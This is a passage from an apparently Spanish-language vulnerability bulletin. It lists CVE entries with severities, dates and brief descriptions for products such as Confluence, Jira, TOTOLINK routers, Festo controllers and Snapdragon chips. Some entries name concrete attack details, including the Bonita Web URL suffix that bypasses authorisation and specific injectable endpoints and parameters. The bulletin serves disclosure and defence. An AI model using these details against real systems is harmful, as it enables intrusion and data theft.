    Screen Creator Advance2, la serie HMI GC-A2 y la herramienta de control y supervisión remota en tiempo real Screen Creator Advance2 versiones anteriores a 0.1.1.3 Build01, la serie HMI GC-A2(GC-A22W-CW, GC-A24W-C(W), GC-A26W-C(W), GC-A24, GC-A24-M, GC-A25, GC-A26, y GC-A26-J2), y la herramienta de monitorización y control remoto en tiempo real(Remote GC) permiten a un atacante local omitir la autenticación debido a la comprobación inapropiada de los nombres de cuenta de la configuración del control remoto. Esto puede permitir que un atacante que pueda acceder a la HMI desde la herramienta de control y supervisión remota en tiempo real pueda llevar a cabo operaciones arbitrarias en la HMI. Como resultado, la información almacenada en la HMI puede ser divulgada, borrada o alterada, y/o el equipo puede ser operado ilegalmente por medio de la HMI
  • CVE-2022-29213
    Severidad: BAJA
    Fecha de publicación: 20/05/2022
    Fecha de última actualización: 21/07/2023
    TensorFlow es una plataforma de código abierto para el aprendizaje automático. En versiones anteriores a 2.9.0, 2.8.1, 2.7.2 y 2.6.4, "tf.compat.v1.signal.rfft2d" y "tf.compat.v1.signal.rfft3d" carecen de comprobación de entrada y, bajo determinadas condiciones, pueden provocar bloqueos (debido a fallos de "CHECK"). Las versiones 2.9.0, 2.8.1, 2.7.2 y 2.6.4 contienen un parche para este problema
  • CVE-2021-4202
    Severidad: MEDIA
    Fecha de publicación: 25/03/2022
    Fecha de última actualización: 04/08/2023
    Se encontró un fallo de uso de memoria previamente liberada en la función nci_request en el archivo net/nfc/nci/core.c en NFC Controller Interface (NCI) en el kernel de Linux. este fallo podría permitir a un atacante local con privilegios de usuario causar un problema de carrera de datos mientras es retirado el dispositivo, conllevando a un problema de escalada de privilegios
  • CVE-2022-31620
    Severidad: MEDIA
    Fecha de publicación: 25/05/2022
    Fecha de última actualización: 08/08/2023
    En libjpeg versiones anteriores a 1.64, La función BitStream(false)::Get en el archivo bitstream.hpp presenta un fallo de aserción que puede causar una denegación de servicio. Esto está relacionado con el acceso a matrices fuera de límites durante la exploración sin pérdida codificada aritméticamente o la exploración secuencial codificada aritméticamente
  • CVE-2022-30190
    Severidad: ALTA
    Fecha de publicación: 01/06/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Microsoft Windows Support Diagnostic Tool (MSDT)
  • CVE-2022-30321
    Severidad: ALTA
    Fecha de publicación: 25/05/2022
    Fecha de última actualización: 08/08/2023
    go-getter hasta 1.5.11 y 2.0.2 permitía el acceso arbitrario al host a través del recorrido de go-getter, el procesamiento de enlaces simbólicos y los fallos de inyección de comandos. Corregido en 1.6.1 y 2.1.0
  • CVE-2022-22127
    Severidad: MEDIA
    Fecha de publicación: 25/05/2022
    Fecha de última actualización: 08/08/2023
    Tableau es consciente de una vulnerabilidad de control de acceso rota presente en Tableau Server que afecta a clientes de Tableau Server que usan Local Identity Store para administrar usuarios. La vulnerabilidad permite que un administrador de sitio malicioso cambie las contraseñas de los usuarios en diferentes sitios alojados en el mismo Tableau Server, lo que puede resultar en un acceso no autorizado a los datos. Las versiones de Tableau Server afectadas son:2020.4.16, 2021.1.13, 2021.2.10, 2021.3.9, 2021.4.4 y anteriores Nota: Todas las versiones futuras de Tableau Server abordarán este problema de seguridad. Las versiones que ya no son compatibles no han sido probadas y pueden ser vulnerables
  • CVE-2022-25245
    Severidad: MEDIA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    Zoho ManageEngine ServiceDesk Plus versiones anteriores a 13001, permite a cualquiera conocer el nombre de la moneda por defecto de la organización
  • CVE-2022-26774
    Severidad: MEDIA
    Fecha de publicación: 26/05/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de lógica con una administración de estados mejorada. Este problema es corregido en iTunes versión 12.12.4 para Windows. Un atacante local puede ser capaz de elevar sus privilegios
  • CVE-2022-26723
    Severidad: ALTA
    Fecha de publicación: 26/05/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de corrupción de memoria con una comprobación de entradas mejorada. Este problema es corregido en macOS Monterey versión 12.4 y macOS Big Sur versión 11.6.6. El montaje de un recurso compartido de red Samba diseñado de forma maliciosa puede conllevar a una ejecución de código arbitrario
  • CVE-2022-22616
    Severidad: MEDIA
    Fecha de publicación: 26/05/2022
    Fecha de última actualización: 08/08/2023
    Este problema ha sido abordado con unas comprobaciones mejoradas. Este problema es corregido en Security Update 2022-003 Catalina, macOS Monterey versión 12.3, macOS Big Sur versión 11.6.5. Un archivo ZIP diseñado de forma maliciosa puede omitir las comprobaciones de Gatekeeper
  • CVE-2022-22662
    Severidad: MEDIA
    Fecha de publicación: 26/05/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de administración de cookies con una administración de estados mejorada. Este problema es corregido en Security Update 2022-003 Catalina, macOS Big Sur versión 11.6.5. El procesamiento de contenido web diseñado de forma maliciosa puede revelar información sensible del usuario
  • CVE-2022-23050
    Severidad: MEDIA
    Fecha de publicación: 24/05/2022
    Fecha de última actualización: 08/08/2023
    ManageEngine AppManager15 (Build No:15510) permite a un usuario administrador autenticado subir un archivo DLL para llevar a cabo un ataque de secuestro de DLL dentro de la carpeta "working" mediante la funcionalidad "Upload Files / Binaries"
  • CVE-2022-29633
    Severidad: ALTA
    Fecha de publicación: 26/05/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en Linglong v1.0, permite a atacantes acceder al fondo de la aplicación por medio de una cookie diseñada
  • CVE-2022-30584
    Severidad: ALTA
    Fecha de publicación: 26/05/2022
    Fecha de última actualización: 08/08/2023
    Archer Platform versiones 6.3 anteriores a 6.11 (6.11.0.0) contiene una vulnerabilidad de control de acceso inapropiado dentro de la funcionalidad SSO ADFS que podría ser explotada por usuarios maliciosos para comprometer el sistema afectado. Las versiones 6.10 P3 (6.10.0.3) y 6.9 SP3 P4 (6.9.3.4) también son versiones corregidas
  • CVE-2022-30585
    Severidad: MEDIA
    Fecha de publicación: 26/05/2022
    Fecha de última actualización: 08/08/2023
    La API REST en Archer Platform versiones 6.x anteriores a 6.11 (6.11.0.0) contiene una vulnerabilidad de Omisión de Autorización. Un usuario malicioso autenticado de forma remota podría explotar esta vulnerabilidad para ver información confidencial. Las versiones 6.10 P3 (6.10.0.3) y 6.9 SP3 P4 (6.9.3.4) también están corregidas
  • CVE-2022-29337
    Severidad: ALTA
    Fecha de publicación: 24/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que C-DATA FD702XW-X-R430 versión v2.1.13_X00, contiene una vulnerabilidad de inyección de comandos por medio del parámetro va_cmd en formlanipv6. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición HTTP diseñada
  • CVE-2022-22663
    Severidad: MEDIA
    Fecha de publicación: 26/05/2022
    Fecha de última actualización: 08/08/2023
    Este problema ha sido abordado con comprobaciones mejoradas para evitar acciones no autorizadas. Este problema es corregido en iOS versión 15.4 y iPadOS versión 15.4, Security Update 2022-004 Catalina, macOS Monterey versión 12.3, macOS Big Sur versión 11.6.6. Una aplicación maliciosa puede omitir las comprobaciones de Gatekeeper
  • CVE-2022-22676
    Severidad: MEDIA
    Fecha de publicación: 26/05/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de comprobación de manejadores de eventos en la API de servicios XPC mediante la eliminación del servicio. Este problema es corregido en macOS Monterey versión 12.2. Una aplicación puede ser capaz de eliminar archivos para los que no presenta permiso
  • CVE-2021-42197
    Severidad: MEDIA
    Fecha de publicación: 02/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en swftools versiones hasta 20201222 por una pérdida de memoria en swftools cuando es usado swfdump. Permite a un atacante causar una ejecución de código
  • CVE-2022-29169
    Severidad: MEDIA
    Fecha de publicación: 01/06/2022
    Fecha de última actualización: 21/07/2023
    BigBlueButton es un sistema de conferencias web de código abierto. Las versiones a partir de 2.2 y anteriores a 2.3.19, 2.4.7 y 2.5.0-beta.2 son vulnerables a ataques de denegación de servicio con expresiones regulares (ReDoS). Usando una RegularExpression específica, un atacante puede causar una denegación de servicio para el servicio bbb-html5. La biblioteca useragent lleva a cabo una comprobación del dispositivo al analizar la entrada del encabezado User-Agent y la hace pasar por lookupUserAgent() (alias de useragent.lookup() ). Esta función maneja la entrada mediante regexing y atacantes pueden abusar de ello al proporcionar alguna carga útil ReDos usando "SmartWatch". Los mantenedores han eliminado "htmlclient/useragent" de las versiones 2.3.19, 2.4.7 y 2.5.0-beta.2. Como mitigación, deshabilite que NginX reenvíe las peticiones al administrador según las indicaciones del aviso de seguridad de GitHub
  • CVE-2021-33504
    Severidad: MEDIA
    Fecha de publicación: 02/06/2022
    Fecha de última actualización: 08/08/2023
    Couchbase Server versiones anteriores a 7.1.0, presenta un Control de Acceso Incorrecto
  • CVE-2022-29235
    Severidad: MEDIA
    Fecha de publicación: 01/06/2022
    Fecha de última actualización: 21/07/2023
    BigBlueButton es un sistema de conferencias web de código abierto. A partir de la versión 2.2 y versiones hasta 2.3.18 y 2.4-rc-6, un atacante que sea capaz de obtener el identificador de una reunión en un servidor puede encontrar información relacionada con un vídeo externo que esta siendo compartiendo, como la marca de tiempo actual y la reproducción/pausa. El problema ha sido parcheado en versiones 2.3.18 y 2.4-rc-6, al modificar el flujo para enviar los datos sólo para usuarios de la reunión. Actualmente no son conocidas mitigaciones
  • CVE-2022-26971
    Severidad: MEDIA
    Fecha de publicación: 02/06/2022
    Fecha de última actualización: 08/08/2023
    La aplicación web Barco Control Room Management Suite, que forma parte de TransForm N versiones anteriores a 3.14, expone un mecanismo de carga de archivos de licencia. Esta carga puede ser ejecutada sin autenticación
  • CVE-2022-25237
    Severidad: ALTA
    Fecha de publicación: 02/06/2022
    Fecha de última actualización: 08/08/2023
    Bonita Web 2021.2 está afectada por una vulnerabilidad de omisión de autenticación/autorización debido a un patrón de exclusión demasiado amplio usado en el RestAPIAuthorizationFilter. Al añadir ;i18ntranslation o /../i18ntranslation/ al final de una URL, los usuarios no privilegiados pueden acceder a los endpoints de la API privilegiados. Esto puede conllevar a una ejecución de código remota al abusar de las acciones privilegiadas de la API
  • CVE-2022-23775
    Severidad: ALTA
    Fecha de publicación: 25/05/2022
    Fecha de última actualización: 08/08/2023
    TrueStack Direct Connect versión 1.4.7, presenta un Control de Acceso Incorrecto
  • CVE-2021-44719
    Severidad: MEDIA
    Fecha de publicación: 25/05/2022
    Fecha de última actualización: 08/08/2023
    Docker Desktop versión 4.3.0, presenta un Control de Acceso Incorrecto
  • CVE-2021-26085
    Severidad: MEDIA
    Fecha de publicación: 02/08/2021
    Fecha de última actualización: 08/08/2023
    Las versiones afectadas de Atlassian Confluence Server permiten a los atacantes remotos visualizar recursos restringidos por medio de una vulnerabilidad de lectura arbitraria de archivos de autorización previa en el endpoint /s/. Las versiones afectadas son anteriores a la versión 7.4.10 y desde la versión 7.5.0 anteriores a 7.12.3
  • CVE-2021-26084
    Severidad: ALTA
    Fecha de publicación: 30/08/2021
    Fecha de última actualización: 08/08/2023
    En las versiones afectadas de Confluence Server y Data Center, se presenta una vulnerabilidad de inyección OGNL que permitiría a un usuario no autenticado ejecutar código arbitrario en una instancia de Confluence Server o Data Center. Las versiones afectadas son las versiones anteriores a 6.13.23, desde versiones 6.14.0 anteriores a 7.4.11, desde versiones 7.5.0 anteriores a 7.11.6 y desde versiones 7.12.0 anteriores a 7.12.5.
  • CVE-2022-0540
    Severidad: MEDIA
    Fecha de publicación: 20/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en Jira Seraph permite a un atacante remoto no autenticado omitir la autenticación mediante el envío de una petición HTTP especialmente diseñada. Esto afecta a Atlassian Jira Server y Data Center versiones anteriores a 8.13.18, versiones 8.14.0 y posteriores anteriores a 8.20.6, y versiones 8.21.0 y posteriores anteriores a 8.22.0. Esto también afecta a Atlassian Jira Service Management Server y Data Center versiones anteriores a 4.13.18, versiones 4.14.0 y posteriores anteriores a 4.20.6, y versiones 4.21.0 y posteriores anteriores a 4.22.0
  • CVE-2022-26151
    Severidad: ALTA
    Fecha de publicación: 12/04/2022
    Fecha de última actualización: 08/08/2023
    Citrix XenMobile Server 10.12 hasta RP11, 10.13 hasta RP7 y 10.14 hasta RP4 permiten la inyección de comandos
  • CVE-2022-30804
    Severidad: MEDIA
    Fecha de publicación: 02/06/2022
    Fecha de última actualización: 08/08/2023
    elitecms versión v1.01, es vulnerable a la eliminación de cualquier archivo por medio del archivo /admin/delete_image.php?file=
  • CVE-2022-1716
    Severidad: BAJA
    Fecha de publicación: 02/06/2022
    Fecha de última actualización: 08/08/2023
    Keep My Notes v1.80.147 permite a un atacante con acceso físico al dispositivo de la víctima saltarse la contraseña/bloqueo de la aplicación para acceder a los datos del usuario. Esto es posible debido a la falta de controles de seguridad adecuados para evitar la manipulación del código dinámico
  • CVE-2022-29855
    Severidad: ALTA
    Fecha de publicación: 11/05/2022
    Fecha de última actualización: 08/08/2023
    Los dispositivos telefónicos SIP de las series 6800 y 6900 de Mitel versiones hasta 27-04-2022, presentan una "funcionalidad no documentada". Una vulnerabilidad en los teléfonos SIP de las series 6800 y 6900 de Mitel, excepto el 6970, versiones 5.1 SP8 (5.1.0.8016) y anteriores, y 6.0 (6.0.0.368) hasta 6.1 HF4 (6.1.0.165), podría permitir a un atacante no autenticado con acceso físico al teléfono conseguir acceso root debido a un control de acceso insuficiente para la funcionalidad test durante el inicio del sistema. Una explotación con éxito podría permitir el acceso a información confidencial y una ejecución de código
  • CVE-2022-32269
    Severidad: ALTA
    Fecha de publicación: 03/06/2022
    Fecha de última actualización: 08/08/2023
    En Real Player versión 20.0.8.310, el Control G2 permite la inyección de javascript no seguro: URIs en páginas locales de error HTTP (mostradas por el núcleo de Internet Explorer). Esto conlleva a una ejecución de código arbitrario
  • CVE-2022-0494
    Severidad: MEDIA
    Fecha de publicación: 25/03/2022
    Fecha de última actualización: 21/07/2023
    Se ha identificado un fallo de filtrado de información del kernel en la función scsi_ioctl en el archivo drivers/scsi/scsi_ioctl.c en el kernel de Linux. este fallo permite a un atacante local con un privilegio de usuario especial (CAP_SYS_ADMIN o CAP_SYS_RAWIO) crear problemas de confidencialidad
  • CVE-2022-28704
    Severidad: ALTA
    Fecha de publicación: 13/06/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de control de acceso inapropiada en Rakuten Casa versiones AP_F_V1_4_1 o AP_F_V2_0_0, permite a un atacante remoto iniciar sesión con el privilegio de root y llevar a cabo una operación arbitraria si el producto está en su configuración predeterminada en la que está configurado para aceptar conexiones SSH desde el lado de la WAN, y también está conectado a Internet con la información de autenticación sin cambios de la configuración predeterminada
  • CVE-2022-26834
    Severidad: MEDIA
    Fecha de publicación: 13/06/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de control de acceso inapropiado en Rakuten Casa versiones AP_F_V1_4_1 o AP_F_V2_0_0, permite a un atacante remoto obtener la información almacenada en el producto porque éste está configurado para aceptar conexiones HTTP desde el lado WAN por defecto
  • CVE-2021-45983
    Severidad: ALTA
    Fecha de publicación: 02/06/2022
    Fecha de última actualización: 08/08/2023
    NetScout nGeniusONE versión 6.3.2, permite una ejecución de código Java RMI
  • CVE-2022-1949
    Severidad: MEDIA
    Fecha de publicación: 02/06/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de control de acceso encontrada en 389-ds-base. Ese manejo inapropiado del filtro que daría resultados incorrectos, pero a medida que ha avanzado, puede determinarse que en realidad es una omisión de control de acceso. Esto puede permitir a cualquier usuario remoto no autenticado emitir un filtro que permita buscar elementos de la base de datos a los que no presenta acceso, incluyendo pero no limitándose a los hashes de userPassword y otros datos confidenciales
  • CVE-2022-31459
    Severidad: BAJA
    Fecha de publicación: 02/06/2022
    Fecha de última actualización: 08/08/2023
    Owl Labs Meeting Owl versión 5.2.0.15, permite a atacantes recuperar el hash del código de acceso por medio de un determinado valor c 10 a través de Bluetooth
  • CVE-2022-31461
    Severidad: BAJA
    Fecha de publicación: 02/06/2022
    Fecha de última actualización: 08/08/2023
    Owl Labs Meeting Owl versión 5.2.0.15, permite a atacantes desactivar el mecanismo de protección del código de acceso por medio de un determinado mensaje c 11
  • CVE-2022-30311
    Severidad: ALTA
    Fecha de publicación: 13/06/2022
    Fecha de última actualización: 10/08/2023
    En la familia de productos CECC-X-M1 de Festo en varias versiones, la petición POST del endpoint http "cecc-x-refresh-request" no comprueba la sintaxis del puerto. Esto puede resultar en una ejecución no autorizada de comandos del sistema con privilegios de root debido a una inyección de comandos de control de acceso inapropiados
  • CVE-2022-30310
    Severidad: ALTA
    Fecha de publicación: 13/06/2022
    Fecha de última actualización: 10/08/2023
    En la familia de productos CECC-X-M1 de Festo en varias versiones, la petición POST del endpoint http "cecc-x-acknerr-request" no comprueba la sintaxis del puerto. Esto puede resultar en una ejecución no autorizada de comandos del sistema con privilegios de root debido a una inyección de comandos de control de acceso inapropiados
  • CVE-2022-30309
    Severidad: ALTA
    Fecha de publicación: 13/06/2022
    Fecha de última actualización: 10/08/2023
    En la familia de productos CECC-X-M1 de Festo en varias versiones, la petición POST del endpoint http "cecc-x-web-viewer-request-off" no comprueba la sintaxis del puerto. Esto puede resultar en una ejecución no autorizada de comandos del sistema con privilegios de root debido a una inyección de comandos de control de acceso inapropiados
  • CVE-2022-30308
    Severidad: ALTA
    Fecha de publicación: 13/06/2022
    Fecha de última actualización: 10/08/2023
    En la familia de productos CECC-X-M1 de Festo en varias versiones, la petición POST del endpoint http "cecc-x-web-viewer-request-on" no comprueba la sintaxis del puerto. Esto puede resultar en la ejecución no autorizada de comandos del sistema con privilegios de root debido a una inyección de comandos de control de acceso inapropiados
  • CVE-2021-42875
    Severidad: ALTA
    Fecha de publicación: 02/06/2022
    Fecha de última actualización: 08/08/2023
    TOTOLINK EX1200T versión V4.1.2cu.5215, contiene una vulnerabilidad de inyección de comandos remota en la función setDiagnosisCfg del archivo lib/cste_modules/system.so para controlar el ipDoamin
  • CVE-2021-42884
    Severidad: ALTA
    Fecha de publicación: 03/06/2022
    Fecha de última actualización: 08/08/2023
    TOTOLINK EX1200T versión V4.1.2cu.5215, contiene una vulnerabilidad de inyección de comando remoto en la función setDeviceName del archivo global.so que puede controlar eldeviceName para atacar
  • CVE-2021-42893
    Severidad: MEDIA
    Fecha de publicación: 03/06/2022
    Fecha de última actualización: 08/08/2023
    En TOTOLINK EX1200T versión V4.1.2cu.5215, un atacante puede obtener información confidencial (wifikey, etc.) sin autorización mediante getSysStatusCfg
  • CVE-2021-39947
    Severidad: MEDIA
    Fecha de publicación: 06/06/2022
    Fecha de última actualización: 08/08/2023
    En circunstancias específicas, los búferes de archivos de rastreo en GitLab Runner versiones hasta 14.3.4, 14.4 a 14.4.2, y 14.5 a 14.5.2 reusarían el descriptor de archivo 0 para múltiples rastreos y mezclarían la salida de varios trabajos
  • CVE-2022-1783
    Severidad: MEDIA
    Fecha de publicación: 06/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab CE/EE afectando a todas las versiones a partir de 14.3 anteriores a 14.9.5, todas las versiones a partir de 14.10 anteriores a 14.10.4, todas las versiones a partir de 15.0 anteriores a 15.0.1. Es posible a mantenedores de grupos maliciosos añadir nuevos miembros a un proyecto dentro de su grupo, mediante la API REST, incluso después de que el propietario de su grupo haya habilitado una configuración para evitar que se añadan miembros a los proyectos dentro de ese grupo
  • CVE-2022-1821
    Severidad: MEDIA
    Fecha de publicación: 06/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab CE/EE afectando todas las versiones a partir de 10.8 anteriores a 14.9.5, todas las versiones a partir de la 14.10 anteriores a 14.10.4, todas las versiones a partir de la 15.0 anteriores a 15.0.1. Es posible que un miembro de un subgrupo pueda acceder a la lista de miembros de su grupo padre
  • CVE-2021-42885
    Severidad: ALTA
    Fecha de publicación: 03/06/2022
    Fecha de última actualización: 08/08/2023
    TOTOLINK EX1200T versión V4.1.2cu.5215, contiene una vulnerabilidad de inyección de comando remoto en la función setDeviceMac del archivo global.so que puede controlar deviceName para atacar
  • CVE-2022-33175
    Severidad: ALTA
    Fecha de publicación: 13/06/2022
    Fecha de última actualización: 08/08/2023
    Las unidades de distribución de energía que son ejecutadas con el firmware de Powertek (varias marcas) versiones anteriores a 3.30.30, presentan una configuración de permisos no segura en el campo user.token que es accesible para todos mediante la API HTTP /cgi/get_param.cgi. Esto conlleva a una revelación de los identificadores de sesión activos de los administradores actualmente conectados. El identificador de sesión puede entonces ser reusado para actuar como administrador, permitiendo una lectura de la contraseña en texto sin cifrar, o la reconfiguración del dispositivo
  • CVE-2021-42891
    Severidad: MEDIA
    Fecha de publicación: 03/06/2022
    Fecha de última actualización: 08/08/2023
    En TOTOLINK EX1200T versión V4.1.2cu.5215, un atacante puede obtener información confidencial (wifikey, etc.) sin autorización
  • CVE-2021-42890
    Severidad: ALTA
    Fecha de publicación: 03/06/2022
    Fecha de última actualización: 08/08/2023
    En TOTOLINK EX1200T versión V4.1.2cu.5215, contiene una vulnerabilidad de inyección de comando remoto en la función NTPSyncWithHost del sistema de archivos.so que puede controlar el hostTime para atacar
  • CVE-2021-42889
    Severidad: MEDIA
    Fecha de publicación: 03/06/2022
    Fecha de última actualización: 08/08/2023
    En TOTOLINK EX1200T versión V4.1.2cu.5215, un atacante puede obtener información confidencial (wifikey, wifiname, etc.) sin autorización
  • CVE-2021-42888
    Severidad: ALTA
    Fecha de publicación: 03/06/2022
    Fecha de última actualización: 08/08/2023
    TOTOLINK EX1200T versión V4.1.2cu.5215, contiene una vulnerabilidad de inyección de comandos remotos en la función setLanguageCfg del archivo global.so que puede controlar langType para atacar
  • CVE-2022-21748
    Severidad: BAJA
    Fecha de publicación: 06/06/2022
    Fecha de última actualización: 08/08/2023
    En telephony se presenta una posible divulgación de información debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. Es requerida una interacción del usuario para su explotación. ID de parche: ALPS06511030; ID de incidencia: ALPS06511030
  • CVE-2022-21749
    Severidad: BAJA
    Fecha de publicación: 06/06/2022
    Fecha de última actualización: 08/08/2023
    En telephony, se presenta una posible divulgación de información debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID de parche: ALPS06511058; ID de incidencia: ALPS06511058
  • CVE-2022-29784
    Severidad: MEDIA
    Fecha de publicación: 03/06/2022
    Fecha de última actualización: 08/08/2023
    PublicCMS versiones V4.0.202204.a y anteriores, contienen un filtrado de información por medio del componente /views/directive/sys/SysConfigDataDirective.java
  • CVE-2022-25313
    Severidad: MEDIA
    Fecha de publicación: 18/02/2022
    Fecha de última actualización: 08/08/2023
    En Expat (también se conoce como libexpat) versiones anteriores a 2.4.5, un atacante puede desencadenar un agotamiento de pila en build_model por medio de una gran profundidad de anidamiento en el elemento DTD
  • CVE-2021-40658
    Severidad: BAJA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Textpattern versión 4.8.7, está afectado por una vulnerabilidad de inyección de HTML mediante "Content)Write)Body"
  • CVE-2022-22072
    Severidad: ALTA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Puede producirse un desbordamiento del búfer debido a una comprobación inapropiada de la longitud de la información de la aplicación NDP en Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music
  • CVE-2022-22057
    Severidad: ALTA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Un uso de memoria previamente liberada en la valla de gráficos debido a una condición de carrera mientras es cerrado el descriptor de archivo de la valla y es destruida la línea de tiempo de gráficos simultáneamente en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables
  • CVE-2021-40616
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    thinkcmf versión v5.1.7, presenta una vulnerabilidad no autorizada. El atacante puede modificar la contraseña de la cuenta de administrador con id 1 mediante los permisos del grupo de administración de usuarios en segundo plano. La condición de uso es que es requerida la autoridad del grupo de administración de usuarios en segundo plano
  • CVE-2021-35120
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Un manejo inapropiado entre las funciones de exportación y liberación en el mismo mango desde el cliente puede conllevar a un uso de memoria previamente liberada en Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile
  • CVE-2021-35095
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Una serialización inapropiada del registro del cliente de la cola de mensajes puede conllevar a una condición de carrera que permita que varios clientes de mensajes gunyah sean registrados con la misma etiqueta en Snapdragon Connectivity, Snapdragon Mobile
  • CVE-2021-35092
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Un procesamiento del algoritmo DCB/AVB con un índice de cola no válido de la petición IOCTL podría conllevar a una modificación arbitraria de la dirección en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music
  • CVE-2021-30350
    Severidad: ALTA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Una falta de verificación del tamaño del encabezado de MBN contra el búfer de entrada puede conllevar a una corrupción de la memoria en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Wearables
  • CVE-2021-30349
    Severidad: ALTA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Una secuencia de control de acceso inapropiada para la base de datos AC después de la asignación de memoria puede conllevar a una posible corrupción de la memoria en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking
  • CVE-2021-30346
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    RPM secure Stream puede acceder a cualquier recurso seguro debido a una configuración inapropiada de la SMMU en Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking
  • CVE-2021-30345
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    RPM secure Stream puede acceder a cualquier recurso seguro debido a una configuración inapropiada de la SMMU en Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking
  • CVE-2021-30344
    Severidad: ALTA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Una autorización inapropiada de un comando de modo de seguridad LTE reproducido puede conllevar a una denegación de servicio en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables
  • CVE-2021-30339
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Una lectura de la salida del PRNG puede conllevar a una generación incorrecta de claves debido a una falta de comprobación del búfer en Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking
  • CVE-2022-29925
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de acceso de puntero no inicializado en el módulo simulador contenido en el editor gráfico "V-SFT" de versiones anteriores a la v6.1.6.0, que puede permitir a un atacante obtener información y/o ejecutar código arbitrario haciendo que un usuario abra un archivo de imagen especialmente diseñado
  • CVE-2022-32560
    Severidad: MEDIA
    Fecha de publicación: 13/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Couchbase Server versiones anteriores a 7.0.4. XDCR carece de comprobación de roles cuando es cambiada la configuración interna
  • CVE-2022-32296
    Severidad: BAJA
    Fecha de publicación: 05/06/2022
    Fecha de última actualización: 08/08/2023
    El kernel de Linux anterior a la versión 5.17.9 permite a los servidores TCP identificar a los clientes observando qué puertos de origen se utilizan. Esto ocurre debido al uso del Algoritmo 4 ("Double-Hash Port Selection Algorithm") del RFC 6056
  • CVE-2022-29773
    Severidad: BAJA
    Fecha de publicación: 03/06/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en el archivo aleksis/core/util/auth_helpers.py: ClientProtectedResourceMixin de AlekSIS-Core versiones v2.8.1 y anteriores, permite a atacantes acceder a ámbitos arbitrarios si no son establecidos específicamente ámbitos permitidos
  • CVE-2022-26134
    Severidad: ALTA
    Fecha de publicación: 03/06/2022
    Fecha de última actualización: 08/08/2023
    En las versiones afectadas de Confluence Server y Data Center, se presenta una vulnerabilidad de inyección OGNL que permitiría a un atacante no autenticado ejecutar código arbitrario en una instancia de Confluence Server o Data Center. Las versiones afectadas son 1.3.0 anteriores a 7.4.17, 7.13.0 anteriores a 7.13.7, 7.14.0 anteriores a 7.14.3, 7.15.0 anteriores a 7.15.2, 7.16.0 anteriores a 7.16.4, 7.17.0 anteriores a 7.17.4 y 7.18.0 anteriores a 7.18.1
  • CVE-2022-21698
    Severidad: MEDIA
    Fecha de publicación: 15/02/2022
    Fecha de última actualización: 24/07/2023
